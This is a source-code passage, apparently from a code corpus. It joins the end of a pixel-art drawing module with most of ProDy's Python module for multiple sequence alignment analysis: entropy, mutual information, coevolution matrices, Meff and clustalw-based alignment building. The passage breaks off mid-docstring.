def draw_line(self, drawing, pt0, pt1, colour):
drawing.draw_line(pt0, pt1, self.translate_pixel(colour))
def draw_polygon(self, drawing, path, colour, fill):
pt0 = path[-1]
for pt1 in path:
self.draw_line(drawing, pt0, pt1, colour)
pt0 = pt1
middle = (sum([p[0] for p in path]) / len(path),
sum([p[1] for p in path]) / len(path))
drawing.fill(middle, fill)
def draw_path_shape(self, drawing, paths, colour, fill):
for path in paths:
pt0 = path[-1]
for pt1 in path:
self.draw_line(drawing, pt0, pt1, colour)
pt0 = pt1
drawing.fill(self.find_point_within(paths, fill), fill)
def find_point_within(self, paths, colour):
for node, attrs in self.pixel_data.pixel_graph.nodes_iter(data=True):
if colour == attrs['value']:
pt = self.scale_pt(node, (0.5, 0.5))
if self.is_inside(pt, paths):
return pt
def is_inside(self, pt, paths):
if not self._is_inside(pt, paths[0]):
# Must be inside the "outside" path.
return False
for path in paths[1:]:
if self._is_inside(pt, path):
# Must be outside the "inside" paths.
return False
return True
def _is_inside(self, pt, path):
inside = False
x, y = pt
x0, y0 = path[-1]
for x1, y1 in path:
if (y0 <= y < y1 or y1 <= y < y0) and (x0 <= x or x1 <= x):
# This crosses our ray.
if (x1 + float(y - y1) / (y0 - y1) * (x0 - x1)) < x:
inside = not inside
x0, y0 = x1, y1
return inside
def draw_shapes(self, drawing, element=None):
for shape in self.pixel_data.shapes:
paths = [[self.scale_pt(p) for p in path]
for path in shape['paths']]
self.draw_path_shape(
drawing, paths, self.GRID_COLOUR, shape['value'])
def read_png(filename):
_w, _h, pixels, _meta = png.Reader(filename=filename).asRGB8()
data = []
for row in pixels:
d_row = []
while row:
d_row.append((row.pop(0), row.pop(0), row.pop(0)))
data.append(d_row)
return data
|
prody/sequence/analysis.py | kaynakb/ProDy | 210 | 12686770 |
# -*- coding: utf-8 -*-
"""This module defines MSA analysis functions."""
__author__ = '<NAME>, <NAME>, <NAME>'
from numbers import Integral
import os
from numpy import dtype, zeros, empty, ones, where, ceil, shape, eye
from numpy import indices, tril_indices, array, ndarray, isscalar, unique
from prody import LOGGER
from prody.utilities import which, MATCH_SCORE, MISMATCH_SCORE
from prody.utilities import GAP_PENALTY, GAP_EXT_PENALTY, ALIGNMENT_METHOD
from prody.sequence.msa import MSA, refineMSA
from prody.sequence.msafile import parseMSA, writeMSA
from prody.sequence.sequence import Sequence
from prody.atomic import Atomic
from prody.measure import calcDistance
from Bio import pairwise2
import sys
__all__ = ['calcShannonEntropy', 'buildMutinfoMatrix', 'calcMSAOccupancy',
'applyMutinfoCorr', 'applyMutinfoNorm', 'calcRankorder', 'filterRankedPairs',
'buildSeqidMatrix', 'uniqueSequences', 'buildOMESMatrix',
'buildSCAMatrix', 'buildDirectInfoMatrix', 'calcMeff',
'buildPCMatrix', 'buildMSA', 'showAlignment', 'alignTwoSequencesWithBiopython',
'alignSequenceToMSA', 'calcPercentIdentities', 'alignSequencesByChain',
'trimAtomsUsingMSA']
doc_turbo = """
By default, *turbo* mode, which uses memory as large as the MSA array
itself but runs four to five times faster, will be used. If memory
allocation fails, the implementation will fall back to the slower,
memory-efficient mode."""
def calcPercentIdentities(msa):
percent_ids = []
aas = ['A','C','D','E','F','G','H','I','J','K','L', \
'M','N','P','Q','R','S','T','V','W','Y','-']
for i in range(len(msa)):
col_list = list(msa.getArray()[:,i])
max_count = 0
for aa in aas:
if col_list.count(aa) > max_count:
max_count = col_list.count(aa)
percent_ids.append(float(max_count)/float(len(col_list))*100)
return percent_ids
def getMSA(msa):
"""Returns MSA character array."""
try:
msa = msa._getArray()
except AttributeError:
pass
try:
dtype_, ndim, shape = msa.dtype, msa.ndim, msa.shape
except AttributeError:
raise TypeError('msa must be an MSA instance or a 2D character array')
if dtype_ != dtype('|S1') or ndim != 2:
raise TypeError('msa must be an MSA instance or a 2D character array')
return msa
def calcShannonEntropy(msa, ambiguity=True, omitgaps=True, **kwargs):
"""Returns Shannon entropy array calculated for *msa*, which may be
an :class:`.MSA` instance or a 2D Numpy character array. Implementation
is case insensitive and handles ambiguous amino acids as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types.
All non-alphabet characters are considered as gaps, and they are handled
in two ways:
* non-existent, the probability of observing amino acids in a given
column is adjusted, by default
* as a distinct character with its own probability, when *omitgaps* is
**False**"""
msa = getMSA(msa)
length = msa.shape[1]
entropy = empty(length, float)
from .msatools import msaentropy
return msaentropy(msa, entropy,
ambiguity=bool(ambiguity), omitgaps=bool(omitgaps))
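# Illustrative usage sketch (not part of the original module): computing the
# per-column entropy of a parsed alignment.  The file name is a placeholder.
#     from prody import parseMSA, calcShannonEntropy
#     msa = parseMSA('PFxxxxx_full.slx')
#     entropy = calcShannonEntropy(msa)   # one value per alignment column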
def buildMutinfoMatrix(msa, ambiguity=True, turbo=True, **kwargs):
"""Returns mutual information matrix calculated for *msa*, which may be an
:class:`.MSA` instance or a 2D Numpy character array. Implementation
is case insensitive and handles ambiguous amino acids as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps.
Mutual information matrix can be normalized or corrected using
:func:`applyMutinfoNorm` and :func:`applyMutinfoCorr` functions,
respectively. Normalization by joint entropy can be performed using this
function with *norm* option set **True**."""
msa = getMSA(msa)
from .msatools import msamutinfo
LOGGER.timeit('_mutinfo')
length = msa.shape[1]
mutinfo = empty((length, length), float)
mutinfo = msamutinfo(msa, mutinfo,
ambiguity=bool(ambiguity), turbo=bool(turbo),
norm=bool(kwargs.get('norm', False)),
debug=bool(kwargs.get('debug', False)))
LOGGER.report('Mutual information matrix was calculated in %.2fs.',
'_mutinfo')
return mutinfo
buildMutinfoMatrix.__doc__ += doc_turbo
def calcMSAOccupancy(msa, occ='res', count=False):
"""Returns occupancy array calculated for residue positions (default,
``'res'`` or ``'col'`` for *occ*) or sequences (``'seq'`` or ``'row'``
for *occ*) of *msa*, which may be an :class:`.MSA` instance or a 2D
NumPy character array. By default, occupancy [0-1] will be calculated.
If *count* is **True**, count of non-gap characters will be returned.
Implementation is case insensitive."""
from .msatools import msaocc
msa = getMSA(msa)
try:
dim = occ.startswith('res') or occ.startswith('col')
except AttributeError:
raise TypeError('occ must be a string')
occ = zeros(msa.shape[int(dim)], float)
return msaocc(msa, occ, dim, count=bool(count))
def applyMutinfoNorm(mutinfo, entropy, norm='sument'):
"""Apply one of the normalizations discussed in [MLC05]_ to *mutinfo*
matrix. *norm* can be one of the following:
* ``'sument'``: :math:`H(X) + H(Y)`, sum of entropy of columns
* ``'minent'``: :math:`min\{H(X), H(Y)\}`, minimum entropy
* ``'maxent'``: :math:`max\{H(X), H(Y)\}`, maximum entropy
* ``'mincon'``: :math:`min\{H(X|Y), H(Y|X)\}`, minimum conditional
entropy
* ``'maxcon'``: :math:`max\{H(X|Y), H(Y|X)\}`, maximum conditional
entropy
where :math:`H(X)` is the entropy of a column, and
:math:`H(X|Y) = H(X) - MI(X, Y)`. Normalization with joint entropy, i.e.
:math:`H(X, Y)`, can be done using :func:`.buildMutinfoMatrix` *norm*
argument.
.. [MLC05] <NAME>, <NAME>, <NAME>, <NAME>. Using information theory
to search for co-evolving residues in proteins. *Bioinformatics*
**2005** 21(22):4116-4124."""
try:
ndim, shape = mutinfo.ndim, mutinfo.shape
except AttributeError:
raise TypeError('mutinfo must be a 2D square array')
if ndim != 2 or shape[0] != shape[1]:
raise ValueError('mutinfo must be a 2D square array')
try:
ndim, shapent = entropy.ndim, entropy.shape
except AttributeError:
raise TypeError('entropy must be a numpy array')
if ndim != 1:
raise ValueError('entropy must be a 1D array')
if shapent[0] != shape[0]:
raise ValueError('shape of mutinfo and entropy does not match')
try:
sw = norm.startswith
except AttributeError:
raise TypeError('norm must be a string')
if sw('sument'):
norm = lambda i_val, j_val, val: i_val + j_val
elif sw('minent'):
norm = lambda i_val, j_val, val: min(i_val, j_val)
elif sw('maxent'):
norm = lambda i_val, j_val, val: max(i_val, j_val)
elif sw('mincon'):
norm = lambda i_val, j_val, val: min(i_val - val, j_val - val)
elif sw('maxcon'):
norm = lambda i_val, j_val, val: max(i_val - val, j_val - val)
elif sw('joint'):
raise ValueError('for joint entropy normalization, use '
'buildMutinfoMatrix function')
else:
raise ValueError('norm={0} is not a valid normalization type'
.format(norm))
mi = mutinfo.copy()
for i, i_val in enumerate(entropy):
for j, j_val in enumerate(entropy):
val = mi[i, j]
div = norm(i_val, j_val, val)
if div == 0:
mi[i, j] = 0
else:
mi[i, j] /= div
return mi
def applyMutinfoCorr(mutinfo, corr='prod'):
"""Returns a copy of *mutinfo* array after average product correction
(default) or average sum correction is applied. See [DSD08]_ for details.
.. [DSD08] <NAME>, <NAME>, <NAME>. Mutual information without the
influence of phylogeny or entropy dramatically improves residue
contact prediction. *Bioinformatics* **2008** 24(3):333-340."""
try:
ndim, shape = mutinfo.ndim, mutinfo.shape
except AttributeError:
raise TypeError('mutinfo must be a 2D square array')
if ndim != 2 or shape[0] != shape[1]:
raise ValueError('mutinfo must be a 2D square array')
try:
sw = corr.startswith
except AttributeError:
raise TypeError('correction must be a string')
avg_mipos = mutinfo.sum(1) / (shape[0] - 1)
avg_mi = avg_mipos.mean()
mi = mutinfo.copy()
if sw('prod') or sw('apc'):
for i, i_avg in enumerate(avg_mipos):
for j, j_avg in enumerate(avg_mipos):
mi[i, j] -= (i_avg * j_avg) / avg_mi
elif sw('sum') or sw('asc'):
for i, i_avg in enumerate(avg_mipos):
for j, j_avg in enumerate(avg_mipos):
mi[i, j] -= i_avg + j_avg - avg_mi
else:
raise ValueError('correction must be prod or sum, not ' + corr)
return mi
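# Illustrative usage sketch (not part of the original module): a typical
# mutual information pipeline combining the functions above.  `msa` is assumed
# to come from parseMSA.
#     mi = buildMutinfoMatrix(msa)
#     mi_apc = applyMutinfoCorr(mi, corr='prod')    # average product correction
#     entropy = calcShannonEntropy(msa)
#     mi_norm = applyMutinfoNorm(mi, entropy, norm='sument')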
def filterRankedPairs(pdb, indices, msa_indices, rank_row, rank_col, zscore_sort, \
num_of_pairs=20, seqDistance=5, resi_range=None, \
pdbDistance=8, chain1='A', chain2='A'):
'''
indices and msa_indices are lists output from alignSequenceToMSA
rank_row, rank_col and zscore_sort are the outputs from calcRankorder
:arg num_of_pairs: The number of pairs to be output, if no value is given
then all pairs are output. Default is 20
:type num_of_pairs: int
:arg seqDistance: Remove pairs that are closer than this in the reference sequence
Default is 5
:type seqDistance: int
:arg pdbDistance: Remove pairs with Calpha atoms further apart than this in the PDB
Default is 8
:type pdbDistance: int
:arg chain1: The chain used for the residue specified by rank_row when measuring distances
:type chain1: str
:arg chain2: The chain used for the residue specified by rank_col when measuring distances
:type chain2: str
'''
if isscalar(indices):
raise TypeError('Please provide a valid indices list')
if isscalar(msa_indices):
raise TypeError('Please provide valid msa_indices, which should be a list')
if isscalar(rank_row):
raise TypeError('Please provide ranked row from calcRankorder')
if isscalar(rank_col):
raise ValueError('Please provide ranked col from calcRankorder')
if isscalar(zscore_sort):
raise ValueError('Please provide sorted Z scores from calcRankorder')
if num_of_pairs is None:
num_of_pairs = len(rank_row)
pairList = []
i = -1
j = 0
while j < num_of_pairs:
i += 1
row_idx = indices[where(msa_indices == rank_row[i])[0][0]]
col_idx = indices[where(msa_indices == rank_col[i])[0][0]]
if not isinstance(row_idx, Integral) or not isinstance(col_idx, Integral):
continue
if row_idx - col_idx < seqDistance:
continue
distance = calcDistance(pdb.select('chain %s and resid %s' % (chain1, \
row_idx)).copy(), \
pdb.select('chain %s and resid %s' % (chain2, \
row_idx)).copy())
if distance > pdbDistance:
continue
if resi_range is not None:
if not row_idx in resi_range and not col_idx in resi_range:
continue
pairList.append('%3d:\t%3d\t%3d\t%5.1f\t%5.1f\n'%(i, row_idx, col_idx, zscore_sort[i], distance))
j += 1
return pairList
def buildSeqidMatrix(msa, turbo=True):
"""Returns sequence identity matrix for *msa*."""
msa = getMSA(msa)
LOGGER.timeit('_seqid')
from .seqtools import msaeye
dim = msa.shape[0]
seqid = msaeye(msa, ones((dim, dim), float), turbo=bool(turbo))
LOGGER.report('Sequence identity matrix was calculated in %.2fs.',
'_seqid')
return seqid
buildSeqidMatrix.__doc__ += doc_turbo
def uniqueSequences(msa, seqid=0.98, turbo=True):
"""Returns a boolean array marking unique sequences in *msa*. A sequence
sharing sequence identity of *seqid* or more with another sequence coming
before itself in *msa* will have a **True** value in the array."""
msa = getMSA(msa)
from .seqtools import msaeye
if not (0 < seqid <= 1):
raise ValueError('seqid must satisfy 0 < seqid <= 1')
return msaeye(msa, zeros(msa.shape[0], bool),
unique=seqid, turbo=bool(turbo))
uniqueSequences.__doc__ += doc_turbo
def calcRankorder(matrix, zscore=False, **kwargs):
"""Returns indices of elements and corresponding values sorted in
descending order, if *descend* is **True** (default). Can apply a zscore
normalization; by default along *axis* - 0 such that each column has
``mean=0`` and ``std=1``. If *zscore* analysis is used, the return value contains the
zscores. If matrix is symmetric only lower triangle indices will be
returned, with diagonal elements if *diag* is **True** (default)."""
try:
ndim, shape = matrix.ndim, matrix.shape
except AttributeError:
raise TypeError('matrix must be a 2D array')
if ndim != 2:
raise ValueError('matrix must be a 2D array')
threshold = kwargs.get('threshold', 0.0001)
try:
symm = abs((matrix.transpose() - matrix).max()) < threshold
except:
symm = False
if zscore:
axis = int(bool(kwargs.get('axis', 0)))
matrix = (matrix - matrix.mean(axis)) / matrix.std(axis)
LOGGER.info('Zscore normalization has been applied.')
descend = kwargs.get('descend', True)
if not symm:
if descend:
sorted_index = matrix.argsort(axis=None)[::-1]
else:
sorted_index = matrix.argsort(axis=None)
row = indices(shape)[0].flatten()[sorted_index]
column = indices(shape)[1].flatten()[sorted_index]
else:
LOGGER.info('Matrix is symmetric, only lower triangle indices '
'will be returned.')
if kwargs.get('diag', True):
k = 0
else:
k = -1
ind_row, ind_column = tril_indices(shape[0], k=k)
matrix_lt = matrix[ind_row, ind_column]
if descend:
sorted_index = matrix_lt.argsort(axis=None)[::-1]
else:
sorted_index = matrix_lt.argsort(axis=None)
row = ind_row[sorted_index]
column = ind_column[sorted_index]
return (row, column, matrix[row, column])
def buildOMESMatrix(msa, ambiguity=True, turbo=True, **kwargs):
"""Returns OMES (Observed Minus Expected Squared) covariance matrix
calculated for *msa*, which may be an :class:`.MSA` instance or a 2D
NumPy character array. OMES is defined as::
(N_OBS - N_EX)^2 (f_i,j - f_i * f_j)^2
OMES_(i,j) = sum(------------------) = N * sum(-----------------------)
N_EX f_i * f_j
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps."""
msa = getMSA(msa)
from .msatools import msaomes
LOGGER.timeit('_omes')
length = msa.shape[1]
omes = empty((length, length), float)
omes = msaomes(msa, omes, ambiguity=bool(ambiguity), turbo=bool(turbo),
debug=bool(kwargs.get('debug', False)))
LOGGER.report('OMES matrix was calculated in %.2fs.',
'_omes')
return omes
buildOMESMatrix.__doc__ += doc_turbo
def buildSCAMatrix(msa, turbo=True, **kwargs):
"""Returns SCA matrix calculated for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps."""
msa = getMSA(msa)
if msa.shape[0]<100:
LOGGER.warning('SCA performs best with a larger number of sequences; '
'a minimum of 100 sequences is recommended.')
from .msatools import msasca
LOGGER.timeit('_sca')
length = msa.shape[1]
sca = zeros((length, length), float)
sca = msasca(msa, sca, turbo=bool(turbo))
LOGGER.report('SCA matrix was calculated in %.2fs.', '_sca')
return sca
buildSCAMatrix.__doc__ += doc_turbo
def buildPCMatrix(msa, turbo=False, **kwargs):
"""Returns PC matrix calculated for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Implementation is case insensitive and handles ambiguous amino acids
as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps.
"""
msa = getMSA(msa)
from .msatools import msapsicov
LOGGER.timeit('_psicov')
length = msa.shape[1]
pc = zeros((length, length), float)
pc = msapsicov(msa, pc, turbo=bool(turbo))
LOGGER.report('PC matrix was calculated in %.2fs.', '_psicov')
return pc
def buildDirectInfoMatrix(msa, seqid=.8, pseudo_weight=.5, refine=False,
**kwargs):
"""Returns direct information matrix calculated for *msa*, which may be an
:class:`.MSA` instance or a 2D Numpy character array.
Sequences sharing sequence identity of *seqid* or more with another
sequence are regarded as similar sequences for calculating their weights
using :func:`.calcMeff`.
*pseudo_weight* are the weight for pseudo count probability.
Sequences are not refined by default. When *refine* is set **True**,
the MSA will be refined by the first sequence and the shape of direct
information matrix will be smaller.
"""
msa = getMSA(msa)
from .msatools import msadipretest, msadirectinfo1, msadirectinfo2
from numpy import matrix
LOGGER.timeit('_di')
if msa.shape[0]<250:
LOGGER.warning('DI performs best with a larger number of sequences; '
'a minimum of 250 sequences is recommended.')
refine = 1 if refine else 0
# msadipretest get some parameter from msa to set matrix size
length, q = msadipretest(msa, refine=refine)
c = matrix.dot(matrix(zeros((length*q, 1), float)),
matrix(zeros((1, length*q), float)))
prob = zeros((length, q+1), float)
# msadirectinfo1 return c to be inversed and prob to be used
meff, n, length, c, prob = msadirectinfo1(msa, c, prob, theta=1.-seqid,
pseudocount_weight=pseudo_weight,
refine=refine, q=q+1)
c = c.I
di = zeros((length, length), float)
# get final DI
di = msadirectinfo2(n, length, c, prob, di, q+1)
del prob, c
LOGGER.report('DI matrix was calculated in %.2fs.', '_di')
return di
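# Illustrative usage sketch (not part of the original module): direct
# information followed by rank ordering to list the most strongly coupled
# column pairs.  `msa` is assumed to come from parseMSA.
#     di = buildDirectInfoMatrix(msa, seqid=0.8, refine=True)
#     rows, cols, values = calcRankorder(di, zscore=True)
#     top_pairs = list(zip(rows[:10], cols[:10], values[:10]))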
def calcMeff(msa, seqid=.8, refine=False, weight=False, **kwargs):
"""Returns the Meff for *msa*, which may be an :class:`.MSA`
instance or a 2D Numpy character array.
Since similar sequences in an *msa* decreases the diversity of *msa*,
*Meff* gives a weight for sequences in the *msa*.
For example: if one sequence has 5 similar sequences in the MSA (itself
included), its weight is defined as 1/5 = 0.2. Meff is the sum of all
sequence weights. In other words, Meff can be understood as the effective
number of independent sequences.
Sequences sharing sequence identity of *seqid* or more with another
sequence are regarded as similar sequences to calculate Meff.
Sequences are not refined by default. When *refine* is set **True**, the
MSA will be refined by the first sequence.
The weight for each sequence are returned when *weight* is **True**."""
msa = getMSA(msa)
from .msatools import msameff
LOGGER.timeit('_meff')
refine = 1 if refine else 0
weight = 0 if weight else 1  # meff_only flag: 0 means the weight array is returned as well.
if (not weight):
w = zeros((msa.shape[0]), float)
meff = msameff(msa, theta=1.-seqid, meff_only=weight,
refine=refine, w=w)
else:
meff = msameff(msa, theta=1.-seqid, meff_only=weight, refine=refine)
LOGGER.report('Meff was calculated in %.2fs.', '_meff')
return meff
def alignSequencesByChain(PDBs, **kwargs):
"""
Runs :func:`buildMSA` for each chain and optionally joins the results.
Returns either a single :class:`MSA` or a dictionary containing an :class:`MSA` for each chain.
:arg PDBs: a list of :class:`AtomGroup` objects
:type PDBs: list
:arg join_chains: whether to join chain alignments
default is True
:type join_chains: bool
:arg join_char: a character for joining chain alignments
default is '/' as used by PIR format alignments
:type join_char: str
"""
if isscalar(PDBs):
raise TypeError('PDBs should be array-like')
if not PDBs:
raise ValueError('PDBs should not be empty')
pdbs = []
chains = []
for i, pdb in enumerate(PDBs):
if isinstance(pdb, Atomic):
pdbs.append(pdb)
else:
raise TypeError('each entry in PDBs must be a :class:`Atomic` instance')
chains.append([])
for chain in list(pdbs[i].getHierView()):
chains[i].append(chain)
if i != 0 and len(chains[i]) != len(chains[0]):
raise ValueError('all pdbs should have the same number of chains')
labels = []
for pdb in pdbs:
chids = ''
for chain in list(pdb.getHierView()):
chids += chain.getChid()
labels.append(pdb.getTitle() + '_' + chids)
chains = array(chains)
chain_alignments = []
alignments = {}
for j in range(len(chains[0])):
prefix = 'chain_' + chains[0, j].getChid()
msa = buildMSA(chains[:, j], title=prefix, labels=labels)
msa = refineMSA(msa, colocc=1e-9) # remove gap-only cols
chain_alignments.append(msa)
alignments[labels[0].split('_')[1][j]] = msa
join_chains = kwargs.get('join_chains', True)
join_char = kwargs.get('join_char', '/')
if len(chains[0]) == 1:
join_chains = False
if join_chains:
joined_msaarr = []
for i, chain_alignment in enumerate(chain_alignments):
pdb_seqs = []
for j, sequence in enumerate(chain_alignment):
pdb_seqs.append(sequence)
joined_msaarr.append(join_char.join(pdb_seqs))
result = MSA(joined_msaarr, title='joined_chains',
labels=[label.split('_')[0] for label in labels])
else:
result = alignments
if len(result) == 1:
result = result[list(result.keys())[0]]
return result
def buildMSA(sequences, title='Unknown', labels=None, **kwargs):
"""
Aligns sequences with clustalw or clustalw2 and returns the resulting MSA.
:arg sequences: a file, MSA object or a list or array containing sequences
as Atomic objects with :func:`getSequence` or Sequence objects or strings.
If strings are used then labels must be provided using ``labels``
:type sequences: :class:`Atomic`, :class:`.MSA`,
:class:`~numpy.ndarray`, str
:arg title: the title for the MSA and it will be used as the prefix for output files.
:type title: str
:arg labels: a list of labels to go with the sequences
:type labels: list
:arg align: whether to align the sequences
default True
:type align: bool
:arg method: alignment method, one of either 'global' (biopython.pairwise2.align.globalms),
'local' (biopython.pairwise2.align.localms), clustalw(2), or another software in your path.
Default is 'clustalw'
:type align: str
"""
align = kwargs.get('align', True)
method = kwargs.pop('method', 'clustalw')
# 1. check if sequences are in a fasta file and if not make one
if isinstance(sequences, str):
filename = sequences
elif not isinstance(sequences, MSA):
try:
max_len = 0
for sequence in sequences:
if isinstance(sequence, Atomic):
if len(sequence.ca.copy()) > max_len:
max_len = len(sequence.ca.copy())
elif isinstance(sequence, MSA):
if len(sequence[0]) > max_len:
max_len = len(sequence[0])
else:
if len(sequence) > max_len:
max_len = len(sequence)
msa = []
fetched_labels = []
for i, sequence in enumerate(sequences):
if isinstance(sequence, Atomic):
strseq = sequence.ca.getSequence()
label = sequence.getTitle()
elif isinstance(sequence, Sequence):
strseq = str(sequence)
label = sequence.getLabel()
elif isinstance(sequence, MSA):
strseq = str(sequence[0])
label = sequence.getLabel(0)
LOGGER.warn('Only the first sequence in the MSA at entry {0} is used.'
.format(i))
elif isinstance(sequence, str):
strseq = sequence
label = str(i + 1)
else:
raise TypeError('sequences should be a list of strings, '
'Atomic, or Sequence instances')
strseq = strseq + '-'*(max_len - len(strseq))
msa.append(array(list(strseq)))
fetched_labels.append(label)
sequences = array(msa)
except:
raise TypeError('sequences should be iterable')
# "if a list" is a pythonic way to check if a list is empty or not (or none)
if not labels and fetched_labels:
labels = fetched_labels
labels = [label.replace(' ', '_') for label in labels]
# labels checkers are removed because they will be properly handled in MSA class initialization
msa = MSA(msa=sequences, title=title, labels=labels)
if align and 'clustal' in method:
filename = writeMSA(title + '.fasta', msa)
if align:
# 2. find and run alignment method
if method in ['biopython', 'local', 'global']:
if len(sequences) == 2:
msa, _, _ = alignTwoSequencesWithBiopython(sequences[0], sequences[1], **kwargs)
else:
raise ValueError("Provide only two sequences or another method. \
Biopython pairwise alignment can only be used \
to build an MSA with two sequences.")
elif 'clustalw' in method:
clustalw = which('clustalw')
if clustalw is None:
if which('clustalw2') is not None:
clustalw = which('clustalw2')
else:
raise EnvironmentError("The executable for clustalw was not found, \
install clustalw or add it to the path.")
os.system('"%s" %s -OUTORDER=INPUT'%(clustalw, filename))
# 3. parse and return the new MSA
msa = parseMSA(title + '.aln')
else:
alignTool = which(method)
if alignTool is None:
raise EnvironmentError("The executable for {0} was not found, \
install it or add it to the path.".format(alignTool))
os.system('"%s" %s -OUTORDER=INPUT'%(clustalw, filename))
# 3. parse and return the new MSA
msa = parseMSA(title + '.aln')
return msa
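# Illustrative usage sketch (not part of the original module): building an MSA
# from a few structures with the default clustalw backend (clustalw or
# clustalw2 must be on the PATH).  The PDB codes are placeholders.
#     from prody import parsePDB
#     pdbs = [parsePDB(code) for code in ('1abc', '2def', '3ghi')]
#     msa = buildMSA(pdbs, title='my_family')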
def showAlignment(alignment, **kwargs):
"""
Prints out an alignment as sets of short rows with labels.
:arg alignment: any object with aligned sequences
:type alignment: :class: `.MSA`, list
:arg row_size: the size of each row
default 60
:type row_size: int
:arg indices: a set of indices for some or all sequences
that will be shown above the relevant sequences
:type indices: :class:`~numpy.ndarray`, list
:arg index_start: how far along the alignment to start putting indices
default 0
:type index_start: int
:arg index_stop: how far along the alignment to stop putting indices
default the point when the shortest sequence stops
:type index_stop: int
:arg labels: a list of labels
:type labels: list
"""
row_size = kwargs.get('row_size', 60)
labels = kwargs.get('labels', None)
if labels is not None:
if isscalar(labels):
raise TypeError('labels should be array-like')
for label in labels:
if not isinstance(label, str):
raise TypeError('each label should be a string')
if len(labels) < len(alignment):
raise ValueError('there should be a label for every sequence shown')
else:
labels = []
for i, sequence in enumerate(alignment):
if hasattr(sequence, 'getLabel'):
labels.append(sequence.getLabel())
else:
labels.append(str(i+1))
indices = kwargs.get('indices', None)
index_start = kwargs.get('index_start', 0)
index_stop = kwargs.get('index_stop', 0)
if index_stop == 0 and indices is not None:
locs = []
maxes = []
for index in indices:
int_index = []
for i in index:
if i == '':
int_index.append(0)
else:
int_index.append(int(i))
int_index = array(int_index)
maxes.append(max(int_index))
locs.append(where(int_index == max(int_index))[0][0])
index_stop = locs[where(maxes == min(maxes))[0][0]]
for i in range(int(ceil(len(alignment[0])/float(row_size)))):
for j in range(len(alignment)):
if indices is not None:
sys.stdout.write('\n' + ' '*15 + '\t')
for k in range(row_size*i+10,row_size*(i+1)+10,10):
try:
if k > index_start + 10 and k < index_stop + 10:
sys.stdout.write('{:10d}'.format(int(indices[j][k-1])))
elif k < index_stop:
sys.stdout.write(' '*(k-index_start))
else:
sys.stdout.write(' '*10)
except:
sys.stdout.write(' '*10)
sys.stdout.write('\n')
sys.stdout.write(labels[j][:15] + \
' ' * (15-len(labels[j][:15])) + \
'\t' + str(alignment[j])[60*i:60*(i+1)] + '\n')
sys.stdout.write('\n')
return
def alignSequenceToMSA(seq, msa, **kwargs):
"""
Align a sequence from a PDB or Sequence to a sequence from an MSA
and create two sets of indices.
The sequence from the MSA (*seq*), the alignment and
the two sets of indices are returned.
The first set (*indices*) maps the residue numbers in the PDB to
the reference sequence. The second set (*msa_indices*) indexes the
reference sequence in the msa and is used for retrieving values
from the first indices.
:arg seq: an object with an associated sequence string
or a sequence string itself
:type seq: :class:`.Atomic`, :class:`.Sequence`, str
:arg msa: a multiple sequence alignment
:type msa: :class:`.MSA`
:arg label: a label for a sequence in msa or a PDB ID
``msa.getIndex(label)`` must return a sequence index
:type label: str
:arg chain: which chain from pdb to use for alignment, default is **None**,
which does no selection on *seq*. This value will be ignored if seq is
not an :class:`.Atomic` object.
:type chain: str
Parameters for Biopython ``pairwise2`` alignments can be provided as
keyword arguments. Default values are originally from ``proteins.compare``
module, but now found in ``utilities.seqtools``.
:arg match: a positive integer, used to reward finding a match
:type match: int
:arg mismatch: a negative integer, used to penalise finding a mismatch
:type mismatch: int
